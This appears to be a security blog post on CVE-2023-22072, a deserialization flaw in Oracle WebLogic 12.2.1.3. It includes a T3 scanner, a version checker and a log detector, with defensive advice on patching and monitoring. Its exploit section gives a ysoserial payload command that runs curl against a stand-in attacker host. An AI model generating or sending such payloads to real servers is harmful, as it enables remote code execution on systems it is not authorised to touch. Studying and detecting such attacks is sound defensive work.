CVE-2023-22072 - How Hackers are Taking Over Oracle WebLogic Server (12.2.1.3.) - A Deep Dive
CVE-2023-22072 is a critical vulnerability in Oracle WebLogic Server, specifically version 12.2.1.3. The flaw sits in the Core component of Oracle Fusion Middleware and, alarmingly, is classified as easily exploitable: an attacker needs no credentials, only network access to the server's T3 or IIOP listener. A successful attack gives complete control of the WebLogic Server.
Severity:
- CVSS 3.1 Base Score: 9.8 (Critical)
- Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- Impact: Full loss of Confidentiality, Integrity, and Availability
In this post, I'll detail how CVE-2023-22072 works, how attackers can exploit it, and how to protect your servers. I’ll keep things clear and practical, with real code snippets and links for further reading.
What is the Vulnerability?
Oracle WebLogic Server uses the T3 and IIOP protocols to exchange Java objects between clients and the server. The problem is that WebLogic deserializes objects received over these protocols without adequately validating them, so anyone who can reach the listener can send crafted data that executes code on the server. No authentication is required, so a server behind a firewall is still at risk if its T3/IIOP ports are reachable.
- An unauthenticated attacker can send maliciously crafted data packets using T3 or IIOP.
- WebLogic fails to validate these objects correctly before processing them, leading to _deserialization_ vulnerabilities.
Attack Demo (Simplified Steps)
Below is a Python-based example demonstrating the logic an attacker might use to check for this vulnerability. This is for educational and defensive purposes.
1. Port Scanning for T3 Service
WebLogic usually listens on port 7001 for T3 protocol.
```python
import socket


def scan_weblogic_t3(ip, port=7001):
    """Return True if a WebLogic T3 listener answers the handshake on ip:port."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        try:
            s.settimeout(3)
            s.connect((ip, port))
            # Send the initial T3 handshake; a WebLogic listener replies with a HELO banner
            s.sendall(b't3 12.2.1.3.\nAS:255\nHL:19\nMS:10000000\n')
            response = s.recv(1024)
            if b'HELO' in response:
                print(f"WebLogic T3 protocol detected on {ip}:{port}")
                return True
        except Exception as e:
            print(f"Connection failed: {e}")
    return False


# Example usage
scan_weblogic_t3("192.168.1.100")
```
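The scanner above only reports that a T3 listener answered. For an asset inventory it is more useful to record which version replied, so the result can be compared with the installed patch level. The following is an added example written for this post, not code from the original page or from Oracle: it parses the HELO banner a WebLogic T3 listener returns (the sample reply below is constructed in that shape) and flags the 12.2.1.3 line this post describes as affected. The `check_host` function reuses the same kind of handshake as the scanner; the version-prefix rule, the field names and the handshake string are assumptions.

```python
import socket

# Constructed sample of a T3 handshake reply, in the shape a WebLogic listener
# returns: "HELO:<version>.<secure-flag>" followed by KEY:VALUE lines.
SAMPLE_HELO = b"HELO:12.2.1.3.0.false\nAS:2048\nHL:19\nMS:10000000\n\n"

# Assumption for this example: any release in the 12.2.1.3 line is treated as
# needing its July 2023 patch level verified.
AFFECTED_PREFIX = "12.2.1.3"


def parse_t3_helo(response: bytes) -> dict:
    """Parse a T3 HELO reply into a dict; return {} if it is not a HELO banner."""
    text = response.decode("ascii", errors="replace")
    if not text.startswith("HELO:"):
        return {}
    fields = {}
    lines = text.strip().split("\n")
    # First line, e.g. HELO:12.2.1.3.0.false -> version "12.2.1.3.0", secure "false"
    helo = lines[0][len("HELO:"):]
    version, _, secure = helo.rpartition(".")
    fields["version"] = version
    fields["secure"] = secure == "true"
    # Remaining lines are KEY:VALUE pairs such as AS:2048, HL:19, MS:10000000
    for line in lines[1:]:
        key, sep, value = line.partition(":")
        if sep:
            fields[key] = value
    return fields


def is_affected_version(version: str) -> bool:
    """True for 12.2.1.3 and any 12.2.1.3.x release (assumed rule for this example)."""
    return version == AFFECTED_PREFIX or version.startswith(AFFECTED_PREFIX + ".")


def check_host(ip: str, port: int = 7001, timeout: float = 3.0) -> dict:
    """Connect, send a T3 handshake, and return the parsed banner plus a verdict.

    Returns {} when the listener does not answer with a T3 HELO banner.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        s.connect((ip, port))
        # Handshake string assumed for this example (same structure as the scanner above)
        s.sendall(b"t3 12.2.1\nAS:255\nHL:19\nMS:10000000\n\n")
        reply = s.recv(1024)
    info = parse_t3_helo(reply)
    if info:
        info["affected"] = is_affected_version(info.get("version", ""))
    return info


if __name__ == "__main__":
    # Offline demonstration on the constructed banner; use check_host() against
    # a server you administer to inventory live listeners.
    parsed = parse_t3_helo(SAMPLE_HELO)
    print(parsed, "affected:", is_affected_version(parsed["version"]))
```

A reply that parses with `affected` set should be cross-checked against the patch inventory of that host: the banner reports the product version, and applying the Critical Patch Update does not change that string, so the banner alone cannot prove a server is patched, only that it is exposed.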
2. Sending Exploit Payload
Attackers typically use a Java-based exploit to send serialized objects that trigger code execution.
A common exploitation tool is ysoserial, which generates Java serialized objects for exploits.
Example command to generate a payload:
```shell
java -jar ysoserial.jar CommonsCollections1 'curl http://attacker.com/pwned' > payload.ser
```
Then, with a custom Java or Python client, the attacker would send payload.ser to the WebLogic server using the T3 protocol.
Critical: The above is a demonstration only; do not run malicious code on any system you do not own or have permission to test.
Exploit Tools
- ysoserial (Java deserialization tool)
- Custom T3 protocol exploiters (see public PoCs for earlier deserialization flaws, often modified for new problems)
Oracle Advisory:
- Oracle Critical Patch Update Advisory - July 2023
- NVD CVE Record
- Oracle WebLogic Server Documentation
Apply Security Patches:
Oracle released a patch fixing this vulnerability as part of their July 2023 update. Upgrade to the latest version immediately.
Monitor Logs:
Watch your WebLogic logs for unusual activity, unexplained deserialization errors, or odd new processes.
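As an added example (not from the original post, and not an Oracle or WebLogic tool), here is a small Python detector that scans WebLogic-style server log lines for deserialization failures on the RJVM subsystem and groups them by apparent source address. The log lines are constructed for this example; the message wording, the `from <ip>` phrasing and the indicator list are assumptions about what such entries look like, so adjust the patterns to the real format of your logs.

```python
import re
from collections import Counter

# Constructed sample WebLogic server log lines (not real server output); they mimic
# the ####<timestamp> <severity> <subsystem> <host> <server> <message> layout.
SAMPLE_LOG = """\
####<Oct 17, 2023 10:15:12 PM UTC> <Info> <RJVM> <wls01> <AdminServer> <T3 connection from 10.0.0.5 accepted>
####<Oct 17, 2023 10:15:13 PM UTC> <Error> <RJVM> <wls01> <AdminServer> <Incoming message header or abbreviation processing failed from 203.0.113.7: java.io.InvalidClassException: filter status: REJECTED>
####<Oct 17, 2023 10:15:14 PM UTC> <Error> <RJVM> <wls01> <AdminServer> <Incoming message header or abbreviation processing failed from 203.0.113.7: java.lang.ClassNotFoundException: org.apache.commons.collections.functors.InvokerTransformer>
####<Oct 17, 2023 10:15:20 PM UTC> <Info> <Deployer> <wls01> <AdminServer> <Application myapp deployed>
####<Oct 17, 2023 10:15:21 PM UTC> <Error> <RJVM> <wls01> <AdminServer> <Incoming message header or abbreviation processing failed from 203.0.113.7: java.io.InvalidClassException: filter status: REJECTED>
"""

# Indicators of a rejected or failed deserialization of an incoming T3/IIOP message.
# "filter status: REJECTED" is what the JDK serialization filter reports when it
# blocks a class; the other patterns are assumed message fragments for this example.
INDICATORS = [
    re.compile(r"java\.io\.InvalidClassException"),
    re.compile(r"filter status: REJECTED"),
    re.compile(r"ClassNotFoundException: org\.apache\.commons\.collections"),
    re.compile(r"Incoming message header or abbreviation processing failed"),
]

LINE_RE = re.compile(
    r"^####<(?P<ts>[^>]+)> <(?P<sev>[^>]+)> <(?P<sub>[^>]+)> <[^>]+> <[^>]+> <(?P<msg>.*)>$"
)
IP_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")


def parse_line(line: str):
    """Split one log line into timestamp, severity, subsystem and message, or None."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def find_deserialization_events(log_text: str) -> list:
    """Return one event per log line that matches at least one indicator."""
    events = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        msg = rec["msg"]
        hits = [p.pattern for p in INDICATORS if p.search(msg)]
        if not hits:
            continue
        ip_match = IP_RE.search(msg)
        events.append({
            "ts": rec["ts"],
            "severity": rec["sev"],
            "subsystem": rec["sub"],
            "source": ip_match.group(1) if ip_match else None,
            "indicators": hits,
        })
    return events


def sources_over_threshold(events: list, threshold: int = 2) -> dict:
    """Map source address -> event count for sources at or above the threshold."""
    counts = Counter(e["source"] for e in events if e["source"])
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    found = find_deserialization_events(SAMPLE_LOG)
    for e in found:
        print(e["ts"], e["source"], e["indicators"])
    print("repeat sources:", sources_over_threshold(found))
```

A burst of rejected or failed deserializations from one address is worth an alert even when every message was blocked: it shows the listener is reachable and being probed, which is the exposure this post's mitigation section is about. On a patched server the same script is a cheap way to confirm that T3/IIOP traffic from the internet has actually stopped after the ports were closed.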
Test Your Instance:
Use scanning tools like Nuclei with community templates for WebLogic to check for exposure.
Conclusion
CVE-2023-22072 is incredibly serious—don't wait to patch. An attacker can take over your WebLogic Server with a single, unauthenticated packet. Oracle WebLogic servers are a prime target due to their popularity in big organizations.
Block external access to risky ports, apply updates immediately, and consider regular security scans to ensure safety.
Stay safe, and always keep your software up-to-date!
*This post is for educational and defensive security purposes. For further technical details, always refer to the official Oracle documentation and advisories.*
Timeline
Published on: 10/17/2023 22:15:12 UTC
Last modified on: 10/23/2023 18:19:37 UTC